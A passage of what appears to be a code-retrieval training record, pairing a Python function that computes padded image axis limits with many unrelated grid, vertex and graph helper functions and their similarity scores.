"def vertices(self):\n return list(self.graph_dict.keys())", "def cube_vertices(x, y, z, nx, ny=None, nz=None):\n if ny == None: ny = nx\n if nz == None: nz = nx\n return [\n x - nx, y + ny, z - nz, x - nx, y + ny, z + nz, x + nx, y + ny, z + nz, x + nx, y + ny, z - nz, # top\n x - nx, y - ny, z - nz, x + nx, y - ny, z - nz, x + nx, y - ny, z + nz, x - nx, y - ny, z + nz, # bottom\n x - nx, y - ny, z - nz, x - nx, y - ny, z + nz, x - nx, y + ny, z + nz, x - nx, y + ny, z - nz, # left\n x + nx, y - ny, z + nz, x + nx, y - ny, z - nz, x + nx, y + ny, z - nz, x + nx, y + ny, z + nz, # right\n x - nx, y - ny, z + nz, x + nx, y - ny, z + nz, x + nx, y + ny, z + nz, x - nx, y + ny, z + nz, # front\n x + nx, y - ny, z - nz, x - nx, y - ny, z - nz, x - nx, y + ny, z - nz, x + nx, y + ny, z - nz, # back\n ]", "def get_vertices(self):\n if self.vert_list.keys() != None:\n return self.vert_list.keys()\n raise KeyError(\"Vertex not found\")", "def get_vertices(self) -> []:\n return [i for i in self.adj_list]", "def getSpatialGrid(self, scaled=True):\n if scaled:\n return np.meshgrid(self.x_axis_scaled, self.x_axis_scaled)\n else:\n return np.meshgrid(self.x_axis_unscaled, self.x_axis_unscaled)", "def vertices_from_lines(lines):\n count = len(lines)\n print(\"Getting vertices 1/3\")\n pb = pbar.ProgressBar(count)\n vertices = []\n# print(\"getting vertices from line\")\n for line in lines:\n pb +=1\n vertices.extend(list(line.coords))\n del pb\n return [Point(p) for p in set(vertices)]", "def grids(self):\n x = self.xvalues\n if self.ndim == 1:\n return x\n if self.ndim == 2:\n return x[None, :], x[:, None]\n if self.ndim == 3:\n return x[None, :, None], x[:, None, None], 
x[None, None, :]", "def vertices(self):\r\n return list(self.__graph_dict.keys())", "def get_cell_vertices(self, i, j):\n self._copy_cache = False\n cell_verts = [(self.xvertices[i, j], self.yvertices[i, j]),\n (self.xvertices[i, j+1], self.yvertices[i, j+1]),\n (self.xvertices[i+1, j+1], self.yvertices[i+1, j+1]),\n (self.xvertices[i+1, j], self.yvertices[i+1, j]),]\n self._copy_cache = True\n return cell_verts", "def cells(self):\n \"\"\"\n Note that we use the convention that the first cell is (1,1)\n \"\"\"\n spart_star = self.star()\n part = Partition(list(spart_star))\n coordinates = part.cells()\n coordinates = [(x+1, y+1) for x, y in coordinates]\n return coordinates", "def vertices(self):\n return list(self.__graph_dict.keys())", "def vertices(self):\n return list(self.__graph_dict.keys())", "def vertices(self):\n return list(self.__graph_dict.keys())", "def vertex_ids(self):\n return self.get_ids()", "def cube_vertices(x, y, z, n):\r\n return [\r\n x-n,y+n,z-n, x-n,y+n,z+n, x+n,y+n,z+n, x+n,y+n,z-n, # top\r\n x-n,y-n,z-n, x+n,y-n,z-n, x+n,y-n,z+n, x-n,y-n,z+n, # bottom\r\n x-n,y-n,z-n, x-n,y-n,z+n, x-n,y+n,z+n, x-n,y+n,z-n, # left\r\n x+n,y-n,z+n, x+n,y-n,z-n, x+n,y+n,z-n, x+n,y+n,z+n, # right\r\n x-n,y-n,z+n, x+n,y-n,z+n, x+n,y+n,z+n, x-n,y+n,z+n, # front\r\n x+n,y-n,z-n, x-n,y-n,z-n, x-n,y+n,z-n, x+n,y+n,z-n, # back\r\n ]", "def _fragment(div, eps):\n grids = []\n for lat in range(div):\n for log in range(div):\n init = [(1.0 / div) * lat, (1.0 / div) * log]\n end = [(1.0 / div) * (lat + 1) + 2 * eps,\n (1.0 / div) * (log + 1) + 2 * eps]\n end2 = [(1.0 / div) * (lat + 1), (1.0 / div) * (log + 1)]\n grids.append([init, end, end2])\n return grids", "def uvgrid(self):\n if self.baselines_type != \"grid_centres\":\n ugrid = np.linspace(-self.uv_max, self.uv_max, self.n_uv + 1) # +1 because these are bin edges.\n return (ugrid[1:] + ugrid[:-1]) / 2\n else:\n # return the uv\n return self.baselines", "def grid_adjacent(vertex):\n\tx, y = vertex\n\tadj = []\n\n\tif x > 0:\n\t\tadj.append((x-1, y))\n\tif x < GRID_WIDTH-1:\n\t\tadj.append((x+1, y))\n\tif y > 0:\n\t\tadj.append((x, y-1))\n\tif y < GRID_HEIGHT-1:\n\t\tadj.append((x, y+1))\n\n\treturn adj", "def non_rotated_vertices(self):\n v0 = [self.pos.x - self.width / 2, self.pos.y - self.height / 2]\n v1 = [self.pos.x + self.width / 2, self.pos.y - self.height / 2]\n v2 = [self.pos.x + self.width / 2, self.pos.y + self.height / 2]\n v3 = [self.pos.x - self.width / 2, self.pos.y + self.height / 2]\n return v0, v1, v2, v3", "def calc_grid(self):\n return int(self._posn.x / cell_size), int(self._posn.y / cell_size)", "def _get_all_vertices(self, ref_frame='WORLD') -> np.ndarray:\n\n\t\tdepsgraph = bpy.context.evaluated_depsgraph_get() # to account for deformations\n\n\t\tif ref_frame not in {'LOCAL', 'WORLD'}:\n\t\t\traise ValueError(f\"Invalid ref_frame: {ref_frame}. 
Must be one of ['LOCAL', 'WORLD']\")\n\n\t\tverts = []\n\n\t\tfor mesh in self._meshes:\n\n\t\t\t# use bmesh to get vertices - this accounts for deformations in depsgraph\n\t\t\tbm = bmesh.new()\n\t\t\tbm.from_object(mesh, depsgraph)\n\t\t\tbm.verts.ensure_lookup_table()\n\t\t\tmesh_verts = np.array([x.co for x in bm.verts])\n\t\t\tbm.free()\n\n\t\t\tif ref_frame == 'WORLD':\n\t\t\t\tmesh_verts = np.dot(mesh.matrix_world, np.vstack((mesh_verts.T, np.ones(mesh_verts.shape[0]))))\n\n\t\t\tverts.append(mesh_verts)\n\n\t\tverts = np.concatenate(verts, axis=1)\n\t\tverts /= verts[3] # convert from homogeneous coordinates\n\t\treturn verts[:3].T", "def getVertexNumbers(self):\n return self.vertexIndex.keys()", "def faces_as_vertices(self) -> Iterable[List[Vec3]]:\n v = self.vertices\n for face in self.faces:\n yield [v[index] for index in face]", "def grid(self) -> aa.Grid2D:\r\n return self.analysis.dataset.grid", "def vis_grid(Xs):\n (N, H, W, C) = Xs.shape\n A = int(ceil(sqrt(N)))\n G = np.ones((A * H + A, A * W + A, C), Xs.dtype)\n G *= np.min(Xs)\n n = 0\n for y in range(A):\n for x in range(A):\n if n < N:\n G[y * H + y:(y + 1) * H + y, x * W + x:(x + 1) * W + x, :] = Xs[n, :, :, :]\n n += 1\n # normalize to [0,1]\n maxg = G.max()\n ming = G.min()\n G = (G - ming) / (maxg - ming)\n return G", "def make_grid(self):\n\n\t\tinit_grid = (self.grid_width//2, self.grid_height//2)\n\t\tgrid_list = []\n\n\t\tfor i in range(self.canv_width//self.grid_width):\n\t\t\tfor j in range(self.canv_height//self.grid_height):\n\t\t\t\tif j == 0 or j%2 ==0:\n\t\t\t\t\tgrid_list.append((init_grid[0]+i*self.grid_width, init_grid[1]+j*self.grid_height))\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tgrid_list.append((grid_list[-1][0]+(self.grid_width//2), init_grid[1]+j*self.grid_height))\n\n\t\treturn grid_list", "def all_cells(self):\n \"\"\"\n Note that we use the convention that the first cell is (1,1)\n \"\"\"\n spart_star = self.circle_star()\n part = Partition(list(spart_star))\n coordinates = part.cells()\n coordinates = [(x+1, y+1) for x, y in coordinates]\n return coordinates", "def vertices(self):\n s = set([x for x in self.edges.keys()])\n t = set([y for v in self.edges.values() for (y,d) in v.items()])\n v = s.union(t)\n return list(v)", "def GetRegionVertices(self, *float, **kwargs):\n ...", "def get_vertices(self):\n return str(self.vert_dict.keys())", "def get_neighbour_vertices(self, cur: Union[str, int]) -> list:\n\t\tvertices = [edge[0] if edge[1] == cur else edge[1] for edge in self.get_neighbour_edges(cur)]\n\t\treturn vertices", "def calculate_box(vertices: [[float]]) -> [float]:\n x_coords = [x[0] for x in vertices]\n y_coords = [x[1] for x in vertices]\n z_coords = [x[2] for x in vertices]\n\n return [min(x_coords), min(y_coords), min(z_coords), max(x_coords), max(y_coords), max(z_coords)]", "def get_outer_vertices(feature):\n return [\n point\n for part in Geometry.get_multipolygon(feature)\n for point in part[0][0:-1]\n ]", "def vertices(self):\n top_exp = TopologyUtils.TopologyExplorer(self.topods_shape(), ignore_orientation=True)\n return map(Vertex, top_exp.vertices())", "def vertices(self):\n \n yielded = set()\n \n # Iterate over every tuple of edges, e.g. ..., (1, 2), (4, 3), ...\n for vertices in self.edges():\n # Iterate over every vertex in the tuple, e.g. 
..., 1, 2, 4, 3, ...\n for vertex in vertices:\n # Yield if it has not been yielded already\n if vertex not in yielded:\n yield vertex", "def vertices(size):\n return set(range(size))", "def get_vertices(self):\n output = []\n \n for vertex in self.adjacency_list:\n output.append(vertex.value)\n\n return output", "def verts(self):\n return self._xys[:-1]", "def getGrid(x,y,w,h,x_step=1, y_step=1):\n X,Y = np.mgrid[x:x+w:x_step, y:y+h:y_step]\n return np.array(np.vstack((X.flatten(),Y.flatten())).transpose(), dtype=np.float32)", "def get_sound_vertices(self):\n\n vals = np.sum(np.abs(self.base_vectors), axis=1, keepdims=True)\n V = [[v,-v] for v in vals]\n combs = list(itertools.product(*V))\n\n vertices = []\n for cb in combs:\n vertices.append(self.base_vertices+np.array(cb))\n vertices = np.concatenate(vertices, axis=1)\n return vertices", "def neighbors_in(self, vertex):\n return list(self.neighbor_in_iterator(vertex))", "def make_grid(self, nx, ny):\n nx_vec = np.arange(nx)\n ny_vec = np.arange(ny)\n yv, xv = np.meshgrid(ny_vec, nx_vec)\n grid = np.stack((yv, xv), axis=2)\n grid = grid.reshape(1, 1, ny, nx, 2)\n return grid", "def list_vertices(self):\n return list(self.graph_dict.keys())", "def getHealpixVertices(pixels, nside, nest=False):\n corners = np.transpose(hp.boundaries(nside, pixels, step=1, nest=nest), (0, 2, 1))\n corners_x = corners[:, :, 0].flatten()\n corners_y = corners[:, :, 1].flatten()\n corners_z = corners[:, :, 2].flatten()\n vertices_lon, vertices_lat = hp.rotator.vec2dir(corners_x, corners_y, corners_z, lonlat=True)\n return np.stack([vertices_lon.reshape(-1, 4), vertices_lat.reshape(-1, 4)], axis=-1)", "def find_hull_vertices(points: np.ndarray) -> np.ndarray:\n M = 3\n N = points.shape[0]\n for i in range(4, N):\n while ccw(points[M], points[M - 1], points[i]) >= 0:\n M -= 1\n\n M += 1\n swap(points, M, i)\n\n return points[1:M + 1]", "def redefinir_vertices(self):\n self.nueva_posicion_posible_parte_inferior = [0,0]\n self.nueva_posicion_posible_parte_superior = [0,0]\n self.vertice_1 = self.posicion\n self.vertice_2 = [self.posicion[0] + self.medidas, self.posicion[1]]\n self.vertice_3 = [self.posicion[0], self.posicion[1] + self.medidas]\n self.vertice_4 = [self.posicion[0] + self.medidas, self.posicion[1] + self.medidas]", "def get_neighbors(grid, x, y):\n out = []\n if x > 0:\n out.append(grid[x-1, y])\n if y > 0:\n out.append(grid[x, y-1])\n if y < grid.shape[1] - 1:\n out.append(grid[x, y+1])\n if x < grid.shape[0] - 1:\n out.append(grid[x+1, y])\n return out", "def _create_nodes_from_vertices(self, vertices: List[np.ndarray]) -> List[str]:\n nodes = []\n for vertice in vertices:\n lon, lat = self.proj(vertice[0], vertice[1], inverse=True)\n node = Node(self.id_count, lat, lon)\n nodes.append(node.id_)\n self.osm.add_node(node)\n return nodes", "def create_grid(self):\n return [[0] * self.width for _ in range(self.height)]", "def _calcOrderedCellVertexIDs(self):\n ids = numerix.zeros((8, self.nx, self.ny, self.nz), 'l')\n indices = numerix.indices((self.nx, self.ny, self.nz))\n ids[1] = indices[0] + (indices[1] + (indices[2] + 1) * (self.ny + 1) + 1) * (self.nx + 1)\n ids[0] = ids[1] + 1\n ids[3] = indices[0] + (indices[1] + (indices[2] + 1) * (self.ny + 1)) * (self.nx + 1)\n ids[2] = ids[3] + 1\n ids[5] = indices[0] + (indices[1] + indices[2] * (self.ny + 1) + 1) * (self.nx + 1)\n ids[4] = ids[5] + 1\n ids[7] = indices[0] + (indices[1] + indices[2] * (self.ny + 1)) * (self.nx + 1)\n ids[6] = ids[7] + 1\n\n return numerix.reshape(ids.swapaxes(1, 3), (8, 
self.numberOfCells))", "def hexgrid(self):\n n = self.n * 2\n vectors = []\n for u in range(-n, n+1):\n us = [u] * (2*n+1)\n if u < 0:\n vectors.extend(zip(us, range(-n-u, n+1), range(-n, n+u+1)))\n else:\n vectors.extend(zip(us, range(-n, n-u+1), range(-n+u, n+1)))\n return vectors", "def coord_vecs(self):\n return [np.linspace(x0, x1, nx) for x0, x1, nx in zip(self.mins, self.maxs, self.shape)]", "def vertices(self):\n return self._outgoing.keys()", "def get_vertices_list(feature):\n return [\n point\n for part in Geometry.get_multipolygon(feature)\n for ring in part\n for point in ring[0:-1]\n ]", "def vertex_generator(self):\n for V in self.Vrepresentation():\n if V.is_vertex():\n yield V", "def grid(self):\n return self.__grid", "def grid_coordinates(points: np.array, dtype = np.uint16) -> np.array:\n xmin = np.min(points[:, 0])\n xmax = np.max(points[:, 0]) + 1\n ymin = np.min(points[:, 1])\n ymax = np.max(points[:, 1]) + 1\n return np.asarray([(x, y) for y in range(ymin, ymax)\n for x in range(xmin, xmax)], dtype = dtype)", "def getStartSpots(self):\n spots = []\n if self.index == 0:\n startRow = 1\n endRow = 4\n if self.index == 1:\n startRow = 6\n endRow = 9\n for row in range(startRow, endRow):\n for col in range(1,9):\n spots += [(col, row)]\n return spots", "def get_voxel_grid(bbox, grid_shape):\n # Make sure that we have the appropriate inputs\n assert bbox.shape[0] == 6\n assert bbox.shape[1] == 1\n\n xyz = [\n np.linspace(s, e, c, endpoint=True, dtype=np.float32)\n for s, e, c in\n zip(bbox[:3], bbox[3:], grid_shape)\n ]\n bin_size = np.array([xyzi[1]-xyzi[0] for xyzi in xyz]).reshape(3, 1, 1, 1)\n return np.stack(np.meshgrid(*xyz, indexing=\"ij\")) + bin_size/2", "def generate_square_vertices(geom):\n unit = geom.pix_x.unit\n width = geom.pixel_width.to_value(unit) / 2\n x = geom.pix_x.to_value(unit)\n y = geom.pix_y.to_value(unit)\n\n x_offset = width[:, np.newaxis] * np.array([-1, -1, 1, 1])\n y_offset = width[:, np.newaxis] * np.array([1, -1, -1, 1])\n\n x = x[:, np.newaxis] + x_offset\n y = y[:, np.newaxis] + y_offset\n return x, y", "def ij_coordinates(self):\n\n x = np.arange(self.nx)\n y = np.arange(self.ny)\n return np.meshgrid(x, y)", "def tensor_grid(x):\n\treturn np.vstack(np.meshgrid(*x, indexing = 'ij')).reshape((len(x), -1)).T" ]
[ "0.6591957", "0.65517676", "0.6523746", "0.6520511", "0.64833", "0.64833", "0.64218307", "0.6383808", "0.6376488", "0.63350326", "0.6328131", "0.63177186", "0.6316762", "0.6278034", "0.6251261", "0.6179584", "0.61629945", "0.6152223", "0.61260945", "0.6122966", "0.6108887", "0.60676056", "0.6065647", "0.60630107", "0.60521007", "0.60490906", "0.6042865", "0.60328555", "0.6027899", "0.6008264", "0.60005057", "0.5999993", "0.599495", "0.59603286", "0.5946714", "0.59194773", "0.5900009", "0.5898707", "0.5884395", "0.5853112", "0.584554", "0.5844604", "0.58323616", "0.5829233", "0.5802609", "0.57890654", "0.5787268", "0.5786915", "0.57860225", "0.57860225", "0.57860225", "0.5785146", "0.57598394", "0.57568735", "0.57502794", "0.5732237", "0.57189417", "0.57123196", "0.5710647", "0.57075804", "0.5704906", "0.5692509", "0.56921583", "0.5682122", "0.5671217", "0.5656707", "0.56449246", "0.5608603", "0.56030893", "0.55993694", "0.5578814", "0.5575662", "0.55648255", "0.5564655", "0.5563406", "0.5558604", "0.55573654", "0.55552995", "0.5529451", "0.55252635", "0.5520144", "0.551509", "0.5503583", "0.54966676", "0.5496303", "0.5490904", "0.5484265", "0.5476749", "0.5475671", "0.54750556", "0.5473159", "0.54716724", "0.54678017", "0.54635787", "0.54626346", "0.54583997", "0.5455706", "0.5453851", "0.5450337", "0.5449222" ]
0.76482964
0
Compute padded image limits for x and y grids.
def pad_limits(xgrid, ygrid, xpad=0., ypad=0., square=None):
    xmin, xmax = xgrid.min(), xgrid.max()
    ymin, ymax = ygrid.min(), ygrid.max()
    dx = xmax - xmin
    dy = ymax - ymin

    x0 = xmin - xpad*dx
    x1 = xmax + xpad*dx
    y0 = ymin - ypad*dy
    y1 = ymax + ypad*dy

    if square:
        axis = square
        ax_position = axis.get_position()
        ax_height = ax_position.height * axis.figure.get_figheight()
        ax_width = ax_position.width * axis.figure.get_figwidth()
        ax_aspect = ax_height / ax_width

        im_height = y1 - y0
        im_width = x1 - x0
        im_aspect = im_height / im_width

        if (im_height/im_width) > (ax_height/ax_width):
            # Image too tall
            extra_w = im_height/ax_aspect - im_width
            x0 -= extra_w / 2
            x1 += extra_w / 2
        else:
            # Image too wide
            extra_h = im_width*ax_aspect - im_height
            y0 -= extra_h / 2
            y1 += extra_h / 2

    return [x0, x1, y0, y1]
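A hedged usage sketch (illustrative only, not part of the original record), assuming NumPy and the function above are in scope; without the optional square axis, the returned limits are simply the data range expanded by the requested fractional padding on each side.

import numpy as np

x = np.linspace(0.0, 10.0, 5)
y = np.linspace(-2.0, 2.0, 5)
print(pad_limits(x, y, xpad=0.1, ypad=0.1))  # [-1.0, 11.0, -2.4, 2.4]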
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_image_bounds(pixel_meter_size, frame, beam_width_data, additional_pixel_padding_x=0, additional_pixel_padding_y=0):\n\n # Compute the projected locations of all samples so that we can get the extent\n all_bl = []\n all_br = []\n all_fr = []\n all_fl = []\n\n for beam_num in [0, frame.BeamCount / 2, frame.BeamCount - 1]:\n for bin_num in [0, frame.samplesperbeam - 1]:\n bl, br, fr, fl = get_box_for_sample(beam_num, bin_num, frame, beam_width_data)\n\n all_bl.append(bl)\n all_br.append(br)\n all_fr.append(fr)\n all_fl.append(fl)\n\n all_bl = np.array(all_bl)\n all_br = np.array(all_br)\n all_fr = np.array(all_fr)\n all_fl = np.array(all_fl)\n\n # Get the xdim extent\n min_back_left = np.min(all_bl[:,0])\n min_back_right = np.min(all_br[:,0])\n min_front_left = np.min(all_fl[:,0])\n min_front_right = np.min(all_fr[:,0])\n assert min_back_left < min_back_right\n assert min_back_left < min_front_left\n assert min_back_left < min_front_right\n\n max_back_left = np.max(all_bl[:,0])\n max_back_right = np.max(all_br[:,0])\n max_front_left = np.max(all_fl[:,0])\n max_front_right = np.max(all_fr[:,0])\n assert max_back_right > max_back_left\n assert max_back_right > max_front_left\n assert max_back_right > max_front_right\n\n xdim_extent = np.array([min_back_left, max_back_right])\n\n\n # Get the ydim extent\n min_back_left = np.min(all_bl[:,1])\n min_back_right = np.min(all_br[:,1])\n min_front_left = np.min(all_fl[:,1])\n min_front_right = np.min(all_fr[:,1])\n min_front = min(min_front_left, min_front_right)\n assert min_front < min_back_right\n assert min_front < min_back_left\n\n\n max_back_left = np.max(all_bl[:,1])\n max_back_right = np.max(all_br[:,1])\n max_front_left = np.max(all_fl[:,1])\n max_front_right = np.max(all_fr[:,1])\n max_back = max(max_back_left, max_back_right)\n assert max_back > max_front_right\n assert max_back > max_front_left\n\n ydim_extent = np.array([min_front, max_back])\n\n # Determine which meter location corresponds to our \"target center\"\n bl, br, fr, fl = get_box_for_sample(frame.BeamCount / 2, 0, frame, beam_width_data)\n target_center_x = (fl[0] + fr[0]) / 2.\n target_center_y = (bl[1] + fl[1]) / 2.\n\n # Determine the x dimension size and what this corresponds to in meters\n extra_padding_x = pixel_meter_size + pixel_meter_size * additional_pixel_padding_x\n\n # X Min\n xmin_len = target_center_x - xdim_extent[0]\n xp = xmin_len % pixel_meter_size\n xmin_padded = xdim_extent[0] - (extra_padding_x - xp)\n xmin_len = target_center_x - xmin_padded\n x_min_cells = np.abs(xmin_len / pixel_meter_size)\n x_min_meters = target_center_x - xmin_len\n assert x_min_meters <= xdim_extent[0]\n\n\n # X Max\n xmax_len = xdim_extent[1] - target_center_x\n xp = xmax_len % pixel_meter_size\n xmax_padded = xdim_extent[1] + (extra_padding_x - xp)\n xmax_len = xmax_padded - target_center_x\n x_max_cells = np.abs(xmax_len / pixel_meter_size)\n x_max_meters = target_center_x + xmax_len\n assert x_max_meters >= xdim_extent[1]\n\n\n # if we want a specific beam to be the in the middle of the image then we should take the max?\n xdim = int(x_min_cells + x_max_cells)\n x_meter_start = x_min_meters\n x_meter_stop = x_max_meters\n\n # Determine the y dimension size and what this corresponds to in meters\n extra_padding_y = pixel_meter_size + pixel_meter_size * additional_pixel_padding_y\n\n # Y Min\n ymin_len = target_center_y - ydim_extent[0]\n yp = ymin_len % pixel_meter_size\n ymin_padded = ydim_extent[0] - ( extra_padding_y - yp)\n ymin_len = target_center_y - 
ymin_padded\n y_min_cells = np.abs(ymin_len / pixel_meter_size)\n y_min_meters = target_center_y - ymin_len\n assert y_min_meters <= ydim_extent[0]\n\n # Y Max\n ymax_len = ydim_extent[1] - target_center_y\n yp = ymax_len % pixel_meter_size\n ymax_padded = ydim_extent[1] + (extra_padding_y - yp)\n ymax_len = ymax_padded - target_center_y\n y_max_cells = np.abs(ymax_len / pixel_meter_size)\n y_max_meters = target_center_y + ymax_len\n assert y_max_meters >= ydim_extent[1]\n\n ydim = int(y_min_cells + y_max_cells)\n y_meter_start = y_max_meters\n y_meter_stop = y_min_meters\n\n return xdim, ydim, x_meter_start, y_meter_start, x_meter_stop, y_meter_stop", "def padding(self):\n if not self._pixels:\n return Bounds(0, 0, 0, 0)\n row_inked = tuple(self._1 in _row for _row in self._pixels)\n if not any(row_inked):\n return Bounds(self.width, self.height, 0, 0)\n bottom = row_inked[::-1].index(True)\n top = row_inked.index(True)\n col_inked = tuple(self._1 in _col for _col in zip(*self._pixels))\n left = col_inked.index(True)\n right = col_inked[::-1].index(True)\n return Bounds(left, bottom, right, top)", "def _axes_limits(image_width, fractional_padding=0.5):\n # calculate widths and padding for each item\n overlay_width = image_width\n colorbar_width = int(0.05 * image_width)\n xy_width = image_width\n overlay_colorbar_padding_width = int(0.05 * image_width)\n colorbar_xy_padding_width = int(fractional_padding * image_width)\n\n # set limits based on item sizes\n left_lim = 0\n right_lim = overlay_width\n overlay_lim = (left_lim, right_lim)\n\n left_lim = right_lim + overlay_colorbar_padding_width\n right_lim = left_lim + colorbar_width\n colorbar_lim = (left_lim, right_lim)\n\n left_lim = right_lim + colorbar_xy_padding_width\n right_lim = left_lim + xy_width\n xy_lim = (left_lim, right_lim)\n\n return colorbar_lim, overlay_lim, xy_lim", "def visualize_grid(Xs, ubound=255.0, padding=1):\n (N, H, W, C) = Xs.shape\n grid_size = int(ceil(sqrt(N)))\n grid_height = H * grid_size + padding * (grid_size - 1)\n grid_width = W * grid_size + padding * (grid_size - 1)\n grid = np.zeros((grid_height, grid_width, C))\n next_idx = 0\n y0, y1 = 0, H\n for y in range(grid_size):\n x0, x1 = 0, W\n for x in range(grid_size):\n if next_idx < N:\n img = Xs[next_idx]\n low, high = np.min(img), np.max(img)\n grid[y0:y1, x0:x1] = ubound * (img - low) / (high - low)\n # grid[y0:y1, x0:x1] = Xs[next_idx]\n next_idx += 1\n x0 += W + padding\n x1 += W + padding\n y0 += H + padding\n y1 += H + padding\n # grid_max = np.max(grid)\n # grid_min = np.min(grid)\n # grid = ubound * (grid - grid_min) / (grid_max - grid_min)\n return grid", "def checkRange(x,y,w,h,maxW,maxH):\n if x < 0:\n x = 0\n if y < 0:\n y = 0\n if x + w >= maxW:\n w = maxW-x-1\n if y + h >= maxH:\n h = maxH-y-1\n return [x,y,w,h]", "def __clip_bbox(min_y, min_x, max_y, max_x):\n min_y = tf.clip_by_value(min_y, 0.0, 1.0)\n min_x = tf.clip_by_value(min_x, 0.0, 1.0)\n max_y = tf.clip_by_value(max_y, 0.0, 1.0)\n max_x = tf.clip_by_value(max_x, 0.0, 1.0)\n return min_y, min_x, max_y, max_x", "def bounds(self):\n return self.min_col, self.min_row, self.max_col, self.max_row", "def _get_bounds(x, y, size):\n x = np.array(np.atleast_1d(x))\n y = np.array(np.atleast_1d(y))\n\n lower_x = np.rint(x - size[0]/2)\n lower_y = np.rint(y - size[1]/2)\n\n return np.stack((np.stack((lower_x, lower_x + size[0]), axis=1),\n np.stack((lower_y, lower_y + size[1]), axis=1)), axis=1).astype(int)", "def crop(masks, boxes, padding: int = 1):\n h, w, n = masks.shape\n x1, x2 = 
sanitize_coordinates(boxes[:, 0:1:1], boxes[:, 2:3:1], w, padding, cast=False)\n y1, y2 = sanitize_coordinates(boxes[:, 1:2:1], boxes[:, 3:4:1], h, padding, cast=False)\n\n cast = P.Cast()\n broadcast_to = P.BroadcastTo((h, w, n))\n row = broadcast_to((P.range(Tensor(0, mindspore.int32),\n Tensor(w, mindspore.int32),\n Tensor(1, mindspore.int32)).view(1, -1, 1)))\n rows = cast(row, x1.dtype)\n col = broadcast_to((P.range(Tensor(0, mindspore.int32),\n Tensor(w, mindspore.int32),\n Tensor(1, mindspore.int32)).view(-1, 1, 1)))\n cols = cast(col, x2.dtype)\n\n\n masks_left = rows >= x1.view(1, 1, -1)\n masks_right = rows < x2.view(1, 1, -1)\n masks_left = P.Cast()(masks_left, mindspore.float16)\n masks_right = P.Cast()(masks_right, mindspore.float16)\n crop_mask = masks_left * masks_right\n masks_up = cols >= y1.view(1, 1, -1)\n masks_up = P.Cast()(masks_up, mindspore.float16)\n crop_mask *= masks_up\n masks_down = cols < y2.view(1, 1, -1)\n masks_down = P.Cast()(masks_down, mindspore.float16)\n crop_mask *= masks_down\n\n return masks * crop_mask", "def image_crop_pad_cv2(images,pos_x,pos_y,pix,final_h,final_w,padding_mode=\"cv2.BORDER_CONSTANT\"):\r\n #Convert position of cell from \"um\" to \"pixel index\"\r\n pos_x,pos_y = pos_x/pix,pos_y/pix \r\n\r\n for i in range(len(images)):\r\n image = images[i]\r\n \r\n #Compute the edge-coordinates that define the cropped image\r\n y1 = np.around(pos_y[i]-final_h/2.0) \r\n x1 = np.around(pos_x[i]-final_w/2.0) \r\n y2 = y1+final_h \r\n x2 = x1+final_w\r\n\r\n #Are these coordinates within the oringinal image?\r\n #If not, the image needs padding\r\n pad_top,pad_bottom,pad_left,pad_right = 0,0,0,0\r\n\r\n if y1<0:#Padding is required on top of image\r\n pad_top = int(abs(y1))\r\n y1 = 0 #set y1 to zero and pad pixels after cropping\r\n \r\n if y2>image.shape[0]:#Padding is required on bottom of image\r\n pad_bottom = int(y2-image.shape[0])\r\n y2 = image.shape[0]\r\n \r\n if x1<0:#Padding is required on left of image\r\n pad_left = int(abs(x1))\r\n x1 = 0\r\n \r\n if x2>image.shape[1]:#Padding is required on right of image\r\n pad_right = int(x2-image.shape[1])\r\n x2 = image.shape[1]\r\n \r\n #Crop the image\r\n temp = image[int(y1):int(y2),int(x1):int(x2)]\r\n\r\n if pad_top+pad_bottom+pad_left+pad_right>0:\r\n if padding_mode==\"Delete\":\r\n temp = np.zeros_like(temp)\r\n else:\r\n #Perform all padding operations in one go\r\n temp = cv2.copyMakeBorder(temp, pad_top, pad_bottom, pad_left, pad_right, eval(padding_mode))\r\n \r\n images[i] = temp\r\n \r\n return images", "def boundary(self,image,i,j):\r\n if((j >=25- self.padding) and (j <=175+ self.padding ) and (i >= 425- self.padding) and (i <= 575+ self.padding)):\r\n image[self.maximum_size-i,j,:]=0,0,0\r\n self.image_p[i,j,:]=2\r\n #print(2)\r", "def image_crop_pad_cv2(images,pos_x,pos_y,pix,final_h,final_w,padding_mode=\"cv2.BORDER_CONSTANT\"):\r\n #Convert position of cell from \"um\" to \"pixel index\"\r\n pos_x = [pos_x_/pix for pos_x_ in pos_x]\r\n pos_y = [pos_y_/pix for pos_y_ in pos_y]\r\n padding_modes = [\"cv2.BORDER_CONSTANT\",\"cv2.BORDER_REFLECT\",\"cv2.BORDER_REFLECT_101\",\"cv2.BORDER_REPLICATE\",\"cv2.BORDER_WRAP\"]\r\n \r\n for i in range(len(images)):\r\n image = images[i]\r\n \r\n #Compute the edge-coordinates that define the cropped image\r\n y1 = np.around(pos_y[i]-final_h/2.0) \r\n x1 = np.around(pos_x[i]-final_w/2.0) \r\n y2 = y1+final_h \r\n x2 = x1+final_w\r\n\r\n #Are these coordinates within the oringinal image?\r\n #If not, the image needs padding\r\n 
pad_top,pad_bottom,pad_left,pad_right = 0,0,0,0\r\n\r\n if y1<0:#Padding is required on top of image\r\n pad_top = int(abs(y1))\r\n y1 = 0 #set y1 to zero and pad pixels after cropping\r\n \r\n if y2>image.shape[0]:#Padding is required on bottom of image\r\n pad_bottom = int(y2-image.shape[0])\r\n y2 = image.shape[0]\r\n \r\n if x1<0:#Padding is required on left of image\r\n pad_left = int(abs(x1))\r\n x1 = 0\r\n \r\n if x2>image.shape[1]:#Padding is required on right of image\r\n pad_right = int(x2-image.shape[1])\r\n x2 = image.shape[1]\r\n \r\n #Crop the image\r\n temp = image[int(y1):int(y2),int(x1):int(x2)]\r\n\r\n if pad_top+pad_bottom+pad_left+pad_right>0:\r\n if padding_mode.lower()==\"delete\":\r\n temp = np.zeros_like(temp)\r\n else:\r\n #Perform all padding operations in one go\r\n if padding_mode.lower()==\"alternate\":\r\n ind = rand_state.randint(low=0,high=len(padding_modes))\r\n padding_mode = padding_modes[ind]\r\n temp = cv2.copyMakeBorder(temp, pad_top, pad_bottom, pad_left, pad_right, eval(padding_modes[ind]))\r\n else:\r\n temp = cv2.copyMakeBorder(temp, pad_top, pad_bottom, pad_left, pad_right, eval(padding_mode))\r\n \r\n images[i] = temp\r\n \r\n return images", "def __padding(self, image, boxes, height, width):\n temp = boxes[:, :4].astype(np.int)\n y1 = np.where(temp[:, 0] < 0)[0]\n if len(y1) > 0:\n temp[y1, 0] = 0\n x1 = np.where(temp[:, 1] < 0)[0]\n if len(x1) > 0:\n temp[x1, 0] = 0\n y2 